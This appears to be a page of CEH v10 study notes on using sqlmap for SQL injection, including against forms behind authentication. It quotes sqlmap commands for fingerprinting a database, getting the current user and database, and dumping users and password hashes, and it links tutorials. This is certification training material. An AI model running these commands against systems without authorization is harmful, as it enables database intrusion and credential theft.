- [ Certified Ethical Hacker v10 ] :: [ TOC ]
- [ Certified Ethical Hacker v10 ] :: [ Syllabus ]
- [ Certified Ethical Hacker v10 ] :: [ Chapters 1 & 2 ] :: Footprinting and Reconnaissance
- [ Certified Ethical Hacker v10 ] :: [ Chapter 3 ] :: Scanning
- [ Certified Ethical Hacker v10 ] :: [ Chapter 3 cont’d ] :: Enumeration
- [ Certified Ethical Hacker v10 ] :: [ Chapter 3 cont’d ] :: Vulnerability Analysis
- [ Certified Ethical Hacker v10 ] :: [ Chapter 4 ] :: Sniffing, Evasion and Packet Analysis
- [ Certified Ethical Hacker v10 ] :: [ Chapter 5 ] :: System Hacking
- [ Certified Ethical Hacker v10 ] :: [ Chapter 5 cont’d] :: Hash Cracking
- [ Certified Ethical Hacker v10 ] :: [ Chapter 6 ] :: Web Servers and Applications
- [ Certified Ethical Hacker v10 ] :: [ Chapter 6 cont’d] :: SQL Injection
- [ Certified Ethical Hacker v10 ] :: [ Chapter 6 cont’d] :: sqlmap
- [ Certified Ethical Hacker v10 ] :: [ Chapter 6 cont’d] :: Burp Suite
- [ Certified Ethical Hacker v10 ] :: [ Chapter 7 ] :: WiFi Hacking
- [ Certified Ethical Hacker v10 ] :: [ Chapter 8 ] :: Hacking Mobile Devices
- [ Certified Ethical Hacker v10 ] :: [ Chapter 8 cont’d ] :: Hacking the Internet of Things
- [ Certified Ethical Hacker v10 ] :: [ Chapter 9 ] :: Hacking in the Cloud
- [ Certified Ethical Hacker v10 ] :: [ Chapter 10 ] :: Trojans, Backdoors, Viruses and Worms
- [ Certified Ethical Hacker v10 ] :: [ Chapter 10 cont’d] :: Denial of Service
- [ Certified Ethical Hacker v10 ] :: [ Chapter 10 cont’d] :: Buffer Overflow
- [ Certified Ethical Hacker v10 ] :: [ Chapter 10 cont’d] :: Session Hijacking
- [ Certified Ethical Hacker v10 ] :: [ Chapter 11 ] :: Cryptography
- [ Certified Ethical Hacker v10 ] :: [ Chapter 12 ] :: Social Engineering
- [ Certified Ethical Hacker v10 ] :: [ Chapter 12 ] :: Physical Security
- [ Certified Ethical Hacker v10 ] :: [ Chapter 13 ] :: Pen Testing Methodology
- [ CEH Training ] :: [ Day 7 ]
- Using the GNU Debugger: John Hammond
- [ Review ] :: EC-Council’s iLabs Platform
- [ Certified Ethical Hacker v10 ] :: Using ngrok to Set a Trap From Inside NAT
- [ Certified Ethical Hacker v10 ] :: [ Practical ] :: Become a CEH Master
Using sqlmap
This wicked tool comes with Kali and is easy to install on other Linuxes. All you need is a web form on a website as an entry point for SQL injection.
See this short “cookbook” first for quick examples of usage:
From https://securityonline.info/top-25-useful-sqlmap-commands/
Here’s the lengthy GitHub usage page:
https://github.com/sqlmapproject/sqlmap/wiki/Usage
Using Captured Headers to Get Past Authentication
You can attack injection points manually, or if you need to inject into a form that’s behind authentication, you can capture a header using Burp, save it as a file, and let sqlmap use the parameters (like session tokens and cookies) right from that file.
You can also use the CO2 extension in Burp to pass authentication tokens:
https://security.stackexchange.com/questions/66688/login-required-before-sqlmap
sqlmap POST request injection
From https://hackertarget.com/sqlmap-post-request-injection/ :
# Parse request data and test | request data can be obtained with burp
./sqlmap.py -r <request-file> <options>
#Fingerprint | much more information than banner
./sqlmap.py -r <request-file> --fingerprint
# Get database username, name, and hostname
./sqlmap.py -r <request-file> --current-user --current-db --hostname
# Check if user is a database admin
./sqlmap.py -r <request-file> --is-dba
# Get database users and password hashes
./sqlmap.py -r <request-file> --users --passwords
From https://github.com/sqlmapproject/sqlmap/wiki/Usage :
# Supply POST data with the –data option
python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users
# Manipulate cookies:
Options and switch: --cookie
, --cookie-del
, --load-cookies
and --drop-set-cookie
https://github.com/sqlmapproject/sqlmap/wiki/Usage#http-cookie-header
And here’s a good, straightforward medium-length tutorial with examples of the major operations, like database discovery, table and column enumeration, data dumps etc.:
Or try this shorter tutorial:
https://www.sqlinjection.net/sqlmap/tutorial/
Introducing JackkTutorials. This is a great YouTube channel on lots of hacking subjects, and this 15-minute video walks you through the basics:
https://www.youtube.com/watch?v=yPMbb38pwVI&t=446s
Getting Past Authentication
Finally, here’s some discussion of using sqlmap to access (from the command line or Burp or similar) pages/forms that lie behind authentication, meaning you’ll need to pass session tokens and params with your attacks:
https://medium.com/@jonaldallan/passed-ec-councils-certified-ethical-hacker-practical-20634b6f0f2
Basically, the job is to capture a request header and use it in Burp or with
sqlmap -r headerfile.txt ...